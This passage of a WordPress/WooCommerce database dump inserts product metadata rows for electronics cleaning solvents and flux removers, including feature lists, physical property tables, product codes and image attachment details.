"file";s:42:"miller-stephenson-flux-remover-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16909, 1695, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16910, 1695, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16911, 1695, '_thumbnail_id', '1696'); 
INSERT INTO `wp_postmeta` VALUES (16912, 1695, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16913, 1695, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16914, 1695, '716_default_editor', '<ul>\r\n 	<li>Flux Remover</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16915, 1695, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16916, 1695, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16917, 1695, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16918, 1695, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16919, 1695, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16920, 1695, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16921, 1695, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16922, 1695, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16923, 1695, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16924, 1695, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16925, 1695, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16926, 1695, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16927, 1695, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16928, 1695, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16929, 1695, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16930, 1695, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16931, 1695, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16932, 1695, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16933, 1695, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16934, 1695, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16935, 1695, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16936, 1695, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16937, 1695, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16938, 1695, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16939, 1695, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16940, 1695, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (16941, 1695, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16942, 1695, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16943, 1695, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16944, 1695, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16945, 1695, '_ywtm_content_tab_description', 'Our best no-clean flux remover and heavy duty cleaner. It is nonflammable and suitable for removing no-clean flux as well as oil, ionic salts, and particulate matter. Ideal for field service, production, and prototype work. Evaporates quickly and leaves no residue.'); 
INSERT INTO `wp_postmeta` VALUES (16946, 1695, '_product_image_gallery', '1764'); 
INSERT INTO `wp_postmeta` VALUES (16947, 1697, '_edit_lock', '1491798041:2'); 
INSERT INTO `wp_postmeta` VALUES (16948, 1697, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16949, 1698, '_wp_attached_file', '2016/09/miller-stephenson-flux-remover-solvent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16950, 1698, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5441;s:6:"height";i:3384;s:4:"file";s:50:"2016/09/miller-stephenson-flux-remover-solvent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:50:"miller-stephenson-flux-remover-solvent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:50:"miller-stephenson-flux-remover-solvent-800x498.jpg";s:5:"width";i:800;s:6:"height";i:498;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:50:"miller-stephenson-flux-remover-solvent-768x478.jpg";s:5:"width";i:768;s:6:"height";i:478;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:51:"miller-stephenson-flux-remover-solvent-1600x995.jpg";s:5:"width";i:1600;s:6:"height";i:995;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:50:"miller-stephenson-flux-remover-solvent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:50:"miller-stephenson-flux-remover-solvent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:50:"miller-stephenson-flux-remover-solvent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:50:"miller-stephenson-flux-remover-solvent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16951, 1697, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16952, 1697, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16953, 1697, '_thumbnail_id', '1698'); 
INSERT INTO `wp_postmeta` VALUES (16954, 1697, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Non ozone-depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16955, 1697, '1367_default_editor', '<strong>MS-725 </strong>(12 oz Aerosol)\r\n<strong>MS-725M </strong>(8 oz Aerosol)\r\n<strong>MS-727 </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (16956, 1697, '716_default_editor', '<ul>\r\n 	<li>Flux Removers</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16957, 1697, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16958, 1697, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16959, 1697, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16960, 1697, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16961, 1697, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16962, 1697, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16963, 1697, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16964, 1697, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16965, 1697, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16966, 1697, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16967, 1697, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16968, 1697, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16969, 1697, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16970, 1697, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16971, 1697, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16972, 1697, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16973, 1697, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16974, 1697, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16975, 1697, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16976, 1697, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16977, 1697, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16978, 1697, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16979, 1697, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16980, 1697, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16981, 1697, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16982, 1697, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (16983, 1697, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16984, 1697, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16985, 1697, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16986, 1697, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16987, 1697, '_ywtm_content_tab_description', 'A strong cleaning agent containing a Hydrofluoroether azeotrope, ideally suited for removal of rosin, organic flux, oils, grease and waxes. They also can be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. It replaces HCFC-225 in many applications.'); 
INSERT INTO `wp_postmeta` VALUES (16988, 1697, '_product_image_gallery', '1767'); 
INSERT INTO `wp_postmeta` VALUES (16989, 1700, '_wp_attached_file', '2016/09/flux-removers-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16990, 1700, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4016;s:6:"height";i:4016;s:4:"file";s:27:"2016/09/flux-removers-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"flux-removers-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"flux-removers-1-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"flux-removers-1-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"flux-removers-1-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"flux-removers-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"flux-removers-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"flux-removers-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"flux-removers-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16993, 1703, '_wp_attached_file', '2016/09/glass-cleaners.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16994, 1703, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2592;s:6:"height";i:3888;s:4:"file";s:26:"2016/09/glass-cleaners.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"glass-cleaners-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"glass-cleaners-533x800.jpg";s:5:"width";i:533;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"glass-cleaners-768x1152.jpg";s:5:"width";i:768;s:6:"height";i:1152;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"glass-cleaners-1067x1600.jpg";s:5:"width";i:1067;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"glass-cleaners-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"glass-cleaners-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"glass-cleaners-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:26:"glass-cleaners-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16995, 116, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (16997, 1705, '_edit_lock', '1474653139:3'); 
INSERT INTO `wp_postmeta` VALUES (16998, 1705, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (16999, 1705, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17000, 1705, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17001, 1705, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Boiling Point</td>\r\n<td width="180">36°C</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td>1.32 g/ml @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td>0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17002, 1705, '1367_default_editor', 'MS-580 (Aerosol)\r\n\r\nMS-582 (Bulk Liquid)'); 
INSERT INTO `wp_postmeta` VALUES (17003, 1705, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17004, 1705, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17005, 1705, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17006, 1705, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17007, 1705, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17008, 1705, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17009, 1705, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17010, 1705, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17011, 1705, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17012, 1705, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17013, 1705, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17014, 1705, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17015, 1705, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17016, 1705, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17017, 1705, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17018, 1705, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17019, 1705, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17020, 1705, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17021, 1705, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17022, 1705, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17023, 1705, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17024, 1705, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17025, 1705, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17026, 1705, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17027, 1705, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17028, 1705, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17029, 1705, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17030, 1705, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17031, 1705, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17032, 1705, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17033, 1705, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17034, 1705, '_ywtm_content_tab_description', 'A nonflammable precision cleaning solvent for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays, and switching\r\ndevices. Excellent for cleaning oils, grease, oxidation, and operating erosion dust. Evaporates quickly and leaves no residue. It replaces HCFC-225 in many applications.'); 
INSERT INTO `wp_postmeta` VALUES (17035, 1705, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17039, 1706, '_edit_lock', '1474299734:3'); 
INSERT INTO `wp_postmeta` VALUES (17040, 1706, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17041, 1706, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17042, 1706, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17043, 1706, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Compatible with most plastics, elastomers and rubber</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Boiling Point</td>\r\n<td style="text-align: center;" width="180">55°C</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Liquid Density</td>\r\n<td style="text-align: center;">1.30 g/ml @ 21°C</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>Aerosol VOC Content</td>\r\n<td style="text-align: center;">128 gms/l</td>\r\n</tr>\r\n<tr>\r\n<td>Bulk VOC Content</td>\r\n<td style="text-align: center;">162 gms/l</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">105 mm Hg @ 25°C</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17044, 1706, '1367_default_editor', '<strong>MS-720</strong> (12 oz Aerosol)\r\n<strong>MS-720M </strong>(8 oz Aerosol)\r\n<strong>MS-722 </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (17045, 1706, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17046, 1706, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17047, 1706, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17048, 1706, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17049, 1706, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17050, 1706, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17051, 1706, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17052, 1706, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17053, 1706, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17054, 1706, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17055, 1706, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17056, 1706, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17057, 1706, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17058, 1706, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17059, 1706, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17060, 1706, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17061, 1706, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17062, 1706, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17063, 1706, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17064, 1706, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17065, 1706, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17066, 1706, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17067, 1706, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17068, 1706, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17069, 1706, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17070, 1706, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17071, 1706, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17072, 1706, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17073, 1706, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17074, 1706, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17075, 1706, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17076, 1706, '_ywtm_content_tab_description', 'A precision cleaning solvent that safely and quickly cleans electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Removes oils, oxidation, and operating erosion dust. Safe for plastics including acrylic, polycarbonate, polystyrene and ABS. Safe for most elastomers and metals including zinc and magnesium. Evaporates quickly and leaves no residue.'); 
INSERT INTO `wp_postmeta` VALUES (17077, 1706, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17078, 1707, '_edit_lock', '1477582997:2'); 
INSERT INTO `wp_postmeta` VALUES (17079, 1707, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17080, 1707, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17081, 1707, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17082, 1707, '312_default_editor', '<ul>\r\n 	<li>Ultra Low Global Warming Potential</li>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Safe for most plastics, elastomers and metals</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Boiling Point</td>\r\n<td style="text-align: center;" width="180">21°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">12°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content</td>\r\n<td style="text-align: center;">140 g/liter</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming Potential</td>\r\n<td style="text-align: center;">5.9</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion Potential</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17083, 1707, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17084, 1707, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17085, 1707, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17086, 1707, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17087, 1707, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17088, 1707, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17089, 1707, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17090, 1707, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17091, 1707, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17092, 1707, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17093, 1707, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17094, 1707, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17095, 1707, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17096, 1707, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17097, 1707, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17098, 1707, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17099, 1707, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17100, 1707, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17101, 1707, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17102, 1707, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17103, 1707, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17104, 1707, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17105, 1707, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17106, 1707, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17107, 1707, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17108, 1707, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17109, 1707, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17110, 1707, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17111, 1707, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17112, 1707, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17113, 1707, '_ywtm_override_description', 'no'); 
